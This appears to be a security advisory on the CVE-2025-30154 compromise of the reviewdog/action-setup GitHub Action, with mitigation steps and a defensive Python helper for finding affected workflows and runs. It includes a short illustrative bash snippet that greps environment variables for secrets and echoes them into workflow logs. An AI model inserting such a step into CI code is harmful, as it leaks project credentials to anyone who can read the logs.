CVE-2025-30154 is a vulnerability disclosed on March 11, 2025, affecting the reviewdog/action-setup GitHub Action. Malicious code injected into the action caused secrets available to the workflow to be dumped into the GitHub Actions workflow logs of every run that used the action during a specific window of time. This post covers the details of the compromise, the reviewdog actions affected through their dependency on it, and suggested steps to mitigate the risk for projects that ran the compromised reviewdog/action-setup@v1.

Compromised reviewdog/action-setup@v1

The compromise is known to have been live between 18:42 and 20:31 UTC on March 11, 2025. During that window, the attackers added a code snippet to the action that dumped secrets exposed to the job into the GitHub Actions workflow logs. Any secret that appears in those logs must be treated as accessible to whoever can read them (for a public repository, anyone), which endangers every project that ran the compromised reviewdog actions in that window.

Here is an illustrative snippet of the shape of the injection (not the actual payload). Note that GitHub masks values registered as repository or organization secrets when they appear verbatim in log output, so a real payload has to encode or otherwise obfuscate what it writes in order to get the values past the masking; treat any unexplained encoded blobs in the logs of the window as suspect.

#!/bin/bash

# Injected malicious code (illustrative only: not the real payload).
# Everything written to stdout in an action step ends up in the workflow
# log, so grepping the environment for secret-like variable names and
# echoing the matches is enough to exfiltrate them to anyone who can
# read the log.
exposed_secrets=$(env | grep -Ei "secret|password|token")
echo "Exposing secrets: $exposed_secrets"
# End of injected malicious code

# Original code continues here
# ...

Affected reviewdog actions

While reviewdog/action-setup@v1 was the directly tampered action, other reviewdog GitHub Actions that invoke it internally became vulnerable through that dependency. The affected actions are:

1. reviewdog/action-shellcheck
2. reviewdog/action-composite-template
3. reviewdog/action-staticcheck
4. reviewdog/action-ast-grep
5. reviewdog/action-typos

These actions are referenced at various versions and with various pinning methods, but that does not matter: each of them calls reviewdog/action-setup@v1 internally through the mutable v1 tag, so any run of them during the window pulled in the compromised code regardless of how the consuming workflow pinned the outer action.

Exploit details

The exploit runs whenever the compromised reviewdog/action-setup@v1 executes in a job. For runs that fetched the action between 18:42 and 20:31 UTC on March 11, 2025, the injected code dumped the secrets exposed to the job, including tokens, passwords, and other sensitive values, into the GitHub Actions workflow logs. Impacted projects may therefore have leaked credentials, and any leaked credential may already have been used for unauthorized access.

Mitigation recommendations

We recommend the following actions to mitigate the risks associated with CVE-2025-30154:

1. Check the logs: Review the logs of every workflow run that executed during the compromise window (including runs that were still in progress when it opened) for exposed or encoded secrets, and check whether the logs themselves were readable by untrusted parties.
2. Change secrets: If any exposed secrets are identified, or if you cannot rule out exposure, immediately rotate or revoke the corresponding secrets and tokens.
3. Update dependencies: Update the affected reviewdog actions to the latest released version, and pin third-party actions to a full-length commit SHA rather than a mutable tag such as v1, since the compromised code was served under the unchanged v1 tag.
4. Monitor activity: Watch project activity, repository access, and the audit logs of any service whose credentials were available to the affected workflows for signs of unauthorized use.
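The following is an added example, not code from the original post or from the reviewdog project. It automates steps 1 and 3 above on constructed input: it scans workflow YAML for references to the affected reviewdog actions and reports whether each is pinned to an immutable commit SHA, and it filters workflow run records into the set whose execution overlapped the compromise window and whose logs therefore need review. The run-record shape (databaseId, name, createdAt, updatedAt) is assumed to follow what `gh run list --json` returns; the sample workflow, the sample runs and the commit SHA in it are constructed placeholders.

```python
"""Offline helpers for the CVE-2025-30154 mitigation steps (added example)."""
from datetime import datetime, timezone
import re

# Compromise window stated in the advisory (UTC).
WINDOW_START = datetime(2025, 3, 11, 18, 42, tzinfo=timezone.utc)
WINDOW_END = datetime(2025, 3, 11, 20, 31, tzinfo=timezone.utc)

# Directly compromised action plus the actions listed as depending on it.
AFFECTED_ACTIONS = {
    "reviewdog/action-setup",
    "reviewdog/action-shellcheck",
    "reviewdog/action-composite-template",
    "reviewdog/action-staticcheck",
    "reviewdog/action-ast-grep",
    "reviewdog/action-typos",
}

# `uses: owner/repo[/subpath]@ref` lines; local actions (`uses: ./...`) have no ref.
USES_RE = re.compile(r"^\s*-?\s*uses:\s*([\w.-]+/[\w.-]+)(?:/[^@\s]+)?@(\S+)", re.M)
SHA_RE = re.compile(r"^[0-9a-f]{40}$")


def find_affected_uses(workflow_text):
    """Return (action, ref, pinned_to_sha) for every affected action referenced.

    A 40-hex ref is an immutable commit; anything else (v1, master, ...) is a
    mutable pointer that an attacker who controls the repo can move.
    """
    hits = []
    for m in USES_RE.finditer(workflow_text):
        action, ref = m.group(1), m.group(2)
        if action in AFFECTED_ACTIONS:
            hits.append((action, ref, bool(SHA_RE.match(ref))))
    return hits


def _parse_ts(value):
    # GitHub returns RFC 3339 with a trailing Z; older Pythons reject the Z.
    return datetime.fromisoformat(value.replace("Z", "+00:00"))


def runs_overlapping_window(run_records, start=WINDOW_START, end=WINDOW_END):
    """Return databaseIds of runs whose [createdAt, updatedAt] span touches the window.

    Overlap rather than containment matters: a run queued before 18:42 that was
    still executing when the malicious commit landed also fetched the bad code.
    """
    flagged = []
    for rec in run_records:
        created = _parse_ts(rec["createdAt"])
        finished = _parse_ts(rec["updatedAt"])
        if created <= end and finished >= start:
            flagged.append(rec["databaseId"])
    return flagged


# Constructed sample workflow; the SHA below is a placeholder, not a real reviewdog commit.
SAMPLE_WORKFLOW = """\
name: lint
on: [pull_request]
jobs:
  lint:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - uses: reviewdog/action-shellcheck@v1
      - uses: reviewdog/action-setup@0123456789abcdef0123456789abcdef01234567
      - uses: ./.github/actions/local-check
"""

# Constructed sample run records in the `gh run list --json` shape (assumed field names).
SAMPLE_RUNS = [
    {"databaseId": 101, "name": "lint", "createdAt": "2025-03-11T18:10:00Z", "updatedAt": "2025-03-11T18:20:00Z"},
    {"databaseId": 102, "name": "lint", "createdAt": "2025-03-11T19:05:00Z", "updatedAt": "2025-03-11T19:09:00Z"},
    {"databaseId": 103, "name": "lint", "createdAt": "2025-03-11T18:35:00Z", "updatedAt": "2025-03-11T18:50:00Z"},
    {"databaseId": 104, "name": "lint", "createdAt": "2025-03-12T09:00:00Z", "updatedAt": "2025-03-12T09:03:00Z"},
]


def report(workflow_text=SAMPLE_WORKFLOW, runs=SAMPLE_RUNS):
    """Human-readable summary of both checks; returns the two result sets."""
    uses = find_affected_uses(workflow_text)
    for action, ref, pinned in uses:
        state = "pinned to commit SHA" if pinned else "MUTABLE ref, pin to a full SHA"
        print(f"{action}@{ref}: {state}")
    flagged = runs_overlapping_window(runs)
    for run_id in flagged:
        print(f"run {run_id}: executed inside the compromise window, review its log")
    return uses, flagged


if __name__ == "__main__":
    report()
```

In practice feed `find_affected_uses` the contents of each file under `.github/workflows/` and `runs_overlapping_window` the output of `gh run list --json databaseId,name,createdAt,updatedAt --created 2025-03-11 --limit 1000` parsed with `json.loads`. Run 103 in the sample is the case the containment check would miss: it was queued before 18:42 but still running when the window opened.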

Conclusion

CVE-2025-30154 shows why it matters to track dependencies, including the transitive dependencies of the actions a workflow calls, to pin them to immutable revisions, and to monitor project activity. Organizations using the affected GitHub Actions should review their logs for the window, rotate anything that may have leaked, and update and pin their action references.

Timeline

Published on: 03/19/2025 16:15:33 UTC
Last modified on: 03/25/2025 01:00:02 UTC